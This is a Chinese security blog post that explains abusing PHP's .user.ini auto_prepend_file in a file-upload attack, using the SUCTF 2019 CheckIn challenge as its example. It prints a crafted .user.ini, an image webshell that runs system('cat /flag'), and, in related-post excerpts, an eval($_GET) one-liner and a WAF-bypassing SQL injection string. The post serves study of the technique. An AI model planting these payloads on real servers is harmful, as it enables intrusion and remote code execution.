.user.ini的利用

发表于2020-02-28|更新于2024-03-19|安全

|总字数:553|阅读时长:1分钟|浏览量:

.user.ini

我们先在php手册上看一下对.user.ini的介绍：

也就是说我们可以在.user.ini中设置php.ini中PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置，而且只要是在使用 CGI／FastCGI 模式的服务器上都可以使用.user.ini

在p牛的文章中提到了两个有趣的设置：auto_prepend_file和auto_append_file

我们再到手册中看了下这两个设置的定义：

大致意思就是：我们指定一个文件（如a.jpg），那么该文件就会被包含在要执行的php文件中（如index.php），类似于在index.php中插入一句：require(./a.jpg);

这两个设置的区别只是在于auto_prepend_file是在文件前插入；auto_append_file在文件最后插入（当文件调用的有exit()时该设置无效）

SUCTF2019题目中的利用

看过.user.ini的分析后我们的思路应该比较清晰了，我们可以上传一个这样的.user.ini：

1 2	GIF89a auto_prepend_file=a.jpg

此时我们注意到上传目录下还有一个index.php，我们正好需要该目录下有一个可执行php文件，那这简直暴露了考点就是.user.ini，看来这个思路应该是可行的

然后再上传一个这样的图片马a.jpg：

1 2	GIF89a <script language='php'>system('cat /flag');</script>

最后，我们访问http://192.168.177.152:9021/uploads/6683eb5bfa1174bd139499256f60b7ab/index.php

即可得到flag

.user.ini实战利用的可能性

综上所述.user.ini的利用条件如下：

服务器脚本语言为PHP
服务器使用CGI／FastCGI模式
上传目录下要有可执行的php文件

从这来看.user.ini要比.htaccess的应用范围要广一些，毕竟.htaccess只能用于Apache

但仔细推敲我们就会感到**“上传目录下要有可执行的php文件”**这个要求在文件上传中也比较苛刻，应该没有天才开发者会把上传文件放在主目录或者把php文件放在上传文件夹。

参考文章：

https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html

从SUCTF 2019 CheckIn 浅谈.user.ini的利用

文章作者: LYC

文章链接: http://991688344.github.io/2020/02/28/user-ini%E7%9A%84%E5%88%A9%E7%94%A8/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Rick！

相关推荐

无参数函数执行 https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/ 大致思路如下：利用超全局变量进行bypass，进行RCE 进行任意文件读取什么是无参数函数RCE 传统意义上，如果我们有 1eval($_GET['code']); 即代表我们拥有了一句话木马，可以进行getshell，例如但是如果有如下限制 1if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { ...

PHP参数字符串解析特性

利用PHP的字符串解析特性Bypass 我们知道PHP将查询字符串（在URL或正文中）转换为内部GET或的关联数组_GET或的关联数组GET或的关联数组_POST。例如：/?foo=bar变成Array([foo] => “bar”)。值得注意的是，查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如，/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截，那么我们就可以用以下语句绕过： 1/news.php?%20news[id%00=42"+AND+1=0-- 上述PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]中。 PHP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事： 1.删除空白符 2.将某些字符转换为下划线（包括空格）例如： User input Decoded...

PHP反序列化及扩展

php_PDO_prepare安全性

Are PDO prepared statements sufficient to prevent SQL injection? addslashes() Versus mysql_real_escape_string() SQL injection that gets around mysql_real_escape_string() GBK内码查询宽字节注入上文中提到了这种类型的攻击对于任何字符编码都是可能的，只要这个编码集中有一个以0x5c结尾的有效多字节字符,并且0x27是单字节字符': 例如gbk中0xbf5c是一个有效的多字节字符,而0x27是一个有效的单字符'，而utf-8不符合这样的要求。符合要求的编码集有:big5, cp932, gb2312, gbk and...

php_base64_decode的容错

base64解码函数可以接受的字符范围是[A-Za-z0-9+/=]，但是如果php的base64_decode遇到了不在此范围内的字符，php就会直接跳过这些字符，只把在此范围的字符连起来进行解码。我们来做个试验： 1`$i` `= 0 ;``$data` `= ``"upload_progress_ZZ"``;``while``(true){`` ``$i` `+= 1;`` ``$data` `= ``base64_decode``(``$data``); `` ``var_dump(``$data``);`` ``sleep(1);`` ``if``(``$data` `== ``''``){`` ``echo` `"一共解码了:"``.``$i``,``"次\n"``;`` ``break``;`` ``}``}` 运行结果如下： 1`string(12)...

php中的session.upload_progress

hitcon2018 one-line-php-challenge php中的session.upload_progress php中的session.upload_progress 这个功能在php5.4添加的，所以测试的小伙伴，注意下版本哦。在php.ini有以下几个默认选项 1234561. session.upload_progress.enabled = on2. session.upload_progress.cleanup = on3. session.upload_progress.prefix = "upload_progress_"4. session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"5. session.upload_progress.freq = "1%"6. session.upload_progress.min_freq =...

评论

数据加载中